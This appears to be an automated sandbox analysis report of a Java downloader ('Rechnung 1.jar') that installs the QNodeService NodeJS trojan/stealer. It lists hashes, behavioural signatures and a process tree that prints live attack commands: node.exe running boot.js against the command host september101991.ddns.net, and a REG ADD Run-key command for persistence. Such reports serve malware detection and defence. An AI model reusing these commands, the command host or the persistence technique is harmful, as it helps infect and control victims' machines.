Analysis
-
max time kernel
145s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
10-11-2020 22:17
Static task
static1
Behavioral task
behavioral1
Sample
Rechnung 1.jar
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Rechnung 1.jar
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
Rechnung 1.jar
-
Size
106KB
-
MD5
126760476a6daefa180ec5d62e4d8384
-
SHA1
a9c1761c7eea022303918e4a97d6ee20481a0e7e
-
SHA256
9c4265f1cbaa388bb7e281633c441a52b63b4f8462182a85beebc4e148a152a6
-
SHA512
cd8c71196f2f7c07003972cd970bc0121eb7129a3abc082571371d72eb397f70424fac760a4fa8451104b4d1ecf92e9ee73895e48e6311e68c02e06a47df13f2
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 4592 node.exe 200 node.exe 2932 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\af678428-a5f6-4a94-ac8e-676c9e9ffd5c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab72-172.dat js behavioral2/files/0x000100000001ab72-175.dat js behavioral2/files/0x000100000001ab72-179.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 wtfismyip.com 26 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4592 node.exe 4592 node.exe 4592 node.exe 4592 node.exe 200 node.exe 200 node.exe 200 node.exe 200 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe 2932 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4688 wrote to memory of 892 4688 java.exe 76 PID 4688 wrote to memory of 892 4688 java.exe 76 PID 892 wrote to memory of 4592 892 javaw.exe 80 PID 892 wrote to memory of 4592 892 javaw.exe 80 PID 4592 wrote to memory of 200 4592 node.exe 82 PID 4592 wrote to memory of 200 4592 node.exe 82 PID 200 wrote to memory of 2932 200 node.exe 83 PID 200 wrote to memory of 2932 200 node.exe 83 PID 2932 wrote to memory of 4604 2932 node.exe 85 PID 2932 wrote to memory of 4604 2932 node.exe 85 PID 4604 wrote to memory of 2056 4604 cmd.exe 86 PID 4604 wrote to memory of 2056 4604 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Rechnung 1.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c1cf01a.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BOn32V\boot.js --hub-domain september101991.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:200 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BOn32V\boot.js --hub-domain september101991.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "af678428-a5f6-4a94-ac8e-676c9e9ffd5c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "af678428-a5f6-4a94-ac8e-676c9e9ffd5c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2056
-
-
-
-
-
-